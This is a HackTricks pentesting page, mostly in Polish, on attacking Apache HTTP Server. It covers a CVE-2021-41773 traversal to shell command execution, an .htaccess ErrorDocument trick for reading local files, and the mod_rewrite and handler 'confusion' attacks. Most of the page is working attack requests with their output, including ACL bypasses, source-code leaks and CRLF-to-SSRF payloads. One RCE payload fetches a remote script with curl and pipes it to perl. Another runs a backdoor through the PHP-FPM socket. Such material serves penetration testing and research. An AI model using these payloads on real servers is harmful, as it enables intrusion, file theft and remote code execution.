hacktricks/src/network-services-pentesting/pentesting-web/apache.md

Apache

{{#include ../../banners/hacktricks-training.md}}

Wykonywalne rozszerzenia PHP

Sprawdź, które rozszerzenia są uruchamiane przez serwer Apache. Aby je znaleźć, możesz wykonać:

grep -R -B1 "httpd-php" /etc/apache2

Ponadto, niektóre miejsca, w których można znaleźć tę konfigurację to:

/etc/apache2/mods-available/php5.conf
/etc/apache2/mods-enabled/php5.conf
/etc/apache2/mods-available/php7.3.conf
/etc/apache2/mods-enabled/php7.3.conf

CVE-2021-41773

curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux

LFI przez .htaccess ErrorDocument file provider (ap_expr)

Jeśli możesz kontrolować .htaccess katalogu i AllowOverride obejmuje FileInfo dla tej ścieżki, możesz przekształcić odpowiedzi 404 w dowolne odczyty lokalnych plików, używając funkcji ap_expr file() wewnątrz ErrorDocument.

• Wymagania:
• Apache 2.4 z włączonym parserem wyrażeń (ap_expr) (domyślnie w 2.4).
• vhost/dir musi pozwalać .htaccess na ustawienie ErrorDocument (AllowOverride FileInfo).
• Użytkownik procesu Apache musi mieć uprawnienia do odczytu docelowego pliku.

.htaccess payload:

# Optional marker header just to identify your tenant/request path
Header always set X-Debug-Tenant "demo"
# On any 404 under this directory, return the contents of an absolute filesystem path
ErrorDocument 404 %{file:/etc/passwd}

Wywołaj, żądając dowolnej nieistniejącej ścieżki w tym katalogu, na przykład podczas nadużywania hostingu w stylu userdir:

curl -s http://target/~user/does-not-exist | sed -n '1,20p'

Notatki i wskazówki:

• Działają tylko ścieżki bezwzględne. Zawartość jest zwracana jako ciało odpowiedzi dla obsługi 404.
• Efektywne uprawnienia do odczytu są takie, jak użytkownika Apache (zazwyczaj www-data/apache). Nie odczytasz /root/* ani /etc/shadow w domyślnych konfiguracjach.
• Nawet jeśli .htaccess jest własnością root, jeśli katalog nadrzędny należy do tenant i pozwala na zmianę nazwy, możesz być w stanie zmienić nazwę oryginalnego .htaccess i przesłać własny zamiennik przez SFTP/FTP:
• rename .htaccess .htaccess.bk
• put your malicious .htaccess
• Użyj tego, aby odczytać źródła aplikacji w DocumentRoot lub w ścieżkach konfiguracji vhost i wydobyć sekrety (DB creds, API keys, itd.).

Confusion Attack

These types of attacks has been introduced and documented by Orange in this blog post and the following is a summary. The "confusion" attack basically abuses how the tens of modules that work together creating a Apache don't work perfectly synchronised and making some of them modify some unexpected data can cause a vulnerability in a later module.

Filename Confusion

Truncation

The mod_rewrite will trim the content of r->filename after the character ? (modules/mappers/mod_rewrite.c#L4141). This isn't totally wrong as most modules will treat r->filename as an URL. Bur in other occasions this will be treated as file path, which would cause a problem.

• Path Truncation

Możliwe jest nadużycie mod_rewrite jak w poniższym przykładzie reguły, aby uzyskać dostęp do innych plików w systemie plików, usuwając ostatnią część oczekiwanej ścieżki przez dodanie po prostu ?:

RewriteEngine On
RewriteRule "^/user/(.+)$" "/var/user/$1/profile.yml"

# Expected
curl http://server/user/orange
# the output of file `/var/user/orange/profile.yml`

# Attack
curl http://server/user/orange%2Fsecret.yml%3F
# the output of file `/var/user/orange/secret.yml`

• Mislead RewriteFlag Assignment

W poniższej regule rewrite, dopóki URL kończy się na .php, będzie on traktowany i wykonywany jako php. Dlatego możliwe jest wysłanie URL, który kończy się na .php po znaku ?, przy jednoczesnym wczytaniu w ścieżce innego typu pliku (np. obrazu) zawierającego złośliwy kod php:

RewriteEngine On
RewriteRule  ^(.+\.php)$  $1  [H=application/x-httpd-php]

# Attacker uploads a gif file with some php code
curl http://server/upload/1.gif
# GIF89a <?=`id`;>

# Make the server execute the php code
curl http://server/upload/1.gif%3fooo.php
# GIF89a uid=33(www-data) gid=33(www-data) groups=33(www-data)

ACL Bypass

Możliwe jest uzyskanie dostępu do plików, do których użytkownik nie powinien mieć dostępu, nawet jeśli dostęp powinien być zablokowany przy konfiguracjach takich jak:

<Files "admin.php">
AuthType Basic
AuthName "Admin Panel"
AuthUserFile "/etc/apache2/.htpasswd"
Require valid-user
</Files>

To dlatego, że domyślnie PHP-FPM otrzymuje URL-e kończące się na .php, np. http://server/admin.php%3Fooo.php, a ponieważ PHP-FPM usuwa wszystko po znaku ?, powyższy URL pozwoli załadować /admin.php nawet jeśli poprzednia reguła tego zabraniała.

Zamieszanie związane z DocumentRoot

DocumentRoot /var/www/html
RewriteRule  ^/html/(.*)$   /$1.html

Ciekawostka dotycząca Apache: powyższy rewrite będzie próbował uzyskać dostęp do pliku zarówno z documentRoot, jak i z root. Tak więc żądanie do https://server/abouth.html sprawdzi istnienie pliku w /var/www/html/about.html oraz w /about.html w systemie plików. Co w praktyce można wykorzystać do uzyskania dostępu do plików w systemie plików.

Ujawnienie kodu źródłowego po stronie serwera

• Ujawnij kod źródłowy CGI

Wystarczy dodać %3F na końcu, aby spowodować leak kodu źródłowego modułu cgi:

curl http://server/cgi-bin/download.cgi
# the processed result from download.cgi
curl http://server/html/usr/lib/cgi-bin/download.cgi%3F
# #!/usr/bin/perl
# use CGI;
# ...
# # the source code of download.cgi

• Ujawnij kod źródłowy PHP

Jeśli serwer obsługuje różne domeny, a jedna z nich jest domeną statyczną, można to wykorzystać do przeszukiwania systemu plików i leak php code:

# Leak the config.php file of the www.local domain from the static.local domain
curl http://www.local/var/www.local/config.php%3F -H "Host: static.local"
# the source code of config.php

Local Gadgets Manipulation

Głównym problemem poprzedniego ataku jest to, że domyślnie większość dostępu do systemu plików zostanie zablokowana, jak w Apache HTTP Server’s configuration template:

<Directory />
AllowOverride None
Require all denied
</Directory>

Jednak systemy operacyjne Debian/Ubuntu domyślnie zezwalają na /usr/share:

<Directory /usr/share>
AllowOverride None
Require all granted
</Directory>

Dlatego możliwe byłoby wykorzystanie plików znajdujących się w /usr/share w tych dystrybucjach.

Local Gadget to Information Disclosure

• Apache HTTP Server z websocketd może ujawnić skrypt dump-env.php pod /usr/share/doc/websocketd/examples/php/, który może leak wrażliwe zmienne środowiskowe.
• Serwery z Nginx lub Jetty mogą ujawnić sensitive web application information (np. web.xml) przez swoje domyślne web rooty umieszczone pod /usr/share:
• /usr/share/nginx/html/
• /usr/share/jetty9/etc/
• /usr/share/jetty9/webapps/

Local Gadget to XSS

• Na Ubuntu Desktop z zainstalowanym LibreOffice, wykorzystanie funkcji zmiany języka w plikach pomocy może doprowadzić do Cross-Site Scripting (XSS). Manipulacja URL-em pod /usr/share/libreoffice/help/help.html może przekierować do złośliwych stron lub starszych wersji przez unsafe RewriteRule.

Local Gadget to LFI

• Jeśli PHP lub niektóre front-endowe pakiety jak JpGraph czy jQuery-jFeed są zainstalowane, ich pliki mogą zostać wykorzystane do odczytu wrażliwych plików jak /etc/passwd:
• /usr/share/doc/libphp-jpgraph-examples/examples/show-source.php
• /usr/share/javascript/jquery-jfeed/proxy.php
• /usr/share/moodle/mod/assignment/type/wims/getcsv.php

Local Gadget to SSRF

• Wykorzystanie MagpieRSS's magpie_debug.php w /usr/share/php/magpierss/scripts/magpie_debug.php może łatwo stworzyć SSRF, dając wejście do dalszych exploitów.

Local Gadget to RCE

• Okazji do Remote Code Execution (RCE) jest wiele — podatne instalacje jak przestarzałe PHPUnit czy phpLiteAdmin mogą zostać wykorzystane do wykonania dowolnego kodu, pokazując szeroki potencjał manipulacji lokalnymi gadgetami.

Jailbreak z lokalnych gadgetów

Możliwe jest także jailbreak z dozwolonych folderów przez podążanie za symlinkami tworzonymi przez zainstalowane oprogramowanie w tych folderach, np.:

• Cacti Log: /usr/share/cacti/site/ -> /var/log/cacti/
• Solr Data: /usr/share/solr/data/ -> /var/lib/solr/data
• Solr Config: /usr/share/solr/conf/ -> /etc/solr/conf/
• MediaWiki Config: /usr/share/mediawiki/config/ -> /var/lib/mediawiki/config/
• SimpleSAMLphp Config: /usr/share/simplesamlphp/config/ -> /etc/simplesamlphp/

Co więcej, poprzez nadużycie symlinków możliwe było uzyskanie RCE in Redmine.

Zamieszanie z handlerami

Ten atak wykorzystuje nakładanie się funkcjonalności dyrektyw AddHandler i AddType, które obie mogą być użyte do włączenia przetwarzania PHP. Początkowo te dyrektywy wpływały na różne pola (r->handler oraz r->content_type odpowiednio) w wewnętrznej strukturze serwera. Jednak ze względu na legacy code, Apache traktuje te dyrektywy zamiennie w pewnych warunkach, konwertując r->content_type na r->handler jeśli pierwsze jest ustawione, a drugie nie.

Co więcej, w Apache HTTP Server (server/config.c#L420), jeśli r->handler jest puste przed wywołaniem ap_run_handler(), serwer używa r->content_type jako handlera, efektywnie czyniąc AddType i AddHandler równoważnymi w skutku.

Overwrite Handler to Disclose PHP Source Code

W this talk przedstawiono podatność, gdzie nieprawidłowy nagłówek Content-Length wysłany przez klienta może spowodować, że Apache błędnie zwróci kod źródłowy PHP. Wynikało to z problemu obsługi błędów z ModSecurity i Apache Portable Runtime (APR), gdzie podwójna odpowiedź prowadzi do nadpisania r->content_type na text/html.\
Because ModSecurity doesn't properly handle return values, it would return the PHP code and won't interpret it.

Overwrite Handler to XXXX

TODO: Orange jeszcze nie ujawnił tej luki

Invoke Arbitrary Handlers

Jeśli atakujący jest w stanie kontrolować nagłówek Content-Type w odpowiedzi serwera, będzie w stanie wywołać dowolne module handlers. Jednak w momencie, gdy atakujący to kontroluje, większość procesu requestu będzie już wykonana. Mimo to możliwe jest ponowne uruchomienie procesu requestu poprzez nadużycie nagłówka Location, ponieważ jeśli zwrócony Status jest 200 i nagłówek Location zaczyna się od /, odpowiedź jest traktowana jako Server-Side Redirection i powinna być przetworzona

Zgodnie z RFC 3875 (specyfikacja dotycząca CGI) w Section 6.2.2 zdefiniowano zachowanie Local Redirect Response:

The CGI script can return a URI path and query-string (‘local-pathquery’) for a local resource in a Location header field. This indicates to the server that it should reprocess the request using the path specified.

Dlatego, aby wykonać ten atak, potrzebna jest jedna z następujących podatności:

• CRLF Injection w nagłówkach odpowiedzi CGI
• SSRF z pełną kontrolą nad nagłówkami odpowiedzi

Arbitrary Handler to Information Disclosure

Na przykład /server-status powinien być dostępny tylko lokalnie:

<Location /server-status>
SetHandler server-status
Require local
</Location>

Można uzyskać do niego dostęp ustawiając Content-Type na server-status oraz nagłówek Location zaczynający się od /.

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:server-status %0d%0a
%0d%0a

Przejście z Arbitrary Handler do pełnego SSRF

Przekierowywanie do mod_proxy, aby uzyskać dostęp do dowolnego protokołu pod dowolnym adresem URL:

http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:
http://example.com/%3F
%0d%0a
%0d%0a

Jednak nagłówek X-Forwarded-For jest dodawany, uniemożliwiając dostęp do endpointów metadanych chmury.

Dowolny handler do uzyskania dostępu do lokalnego Unix Domain Socket

Uzyskaj dostęp do lokalnego Unix Domain Socket PHP-FPM, aby wykonać PHP backdoor znajdujący się w /tmp/:

http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/tmp/ooo.php %0d%0a
%0d%0a

Arbitrary Handler to RCE

Oficjalny obraz PHP Docker zawiera PEAR (Pearcmd.php), narzędzie do zarządzania pakietami PHP w linii poleceń, które można nadużyć, aby uzyskać RCE:

http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}
orange.tw/x|perl
) %2b alltests.php %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
%0d%0a

Zapoznaj się z Docker PHP LFI Summary, autorstwa Phith0n, aby poznać szczegóły tej techniki.

Referencje

• https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1
• Apache 2.4 Custom Error Responses (ErrorDocument)
• Apache 2.4 Expressions and functions (file:)
• HTB Zero write-up: .htaccess ErrorDocument LFI and cron pgrep abuse

{{#include ../../banners/hacktricks-training.md}}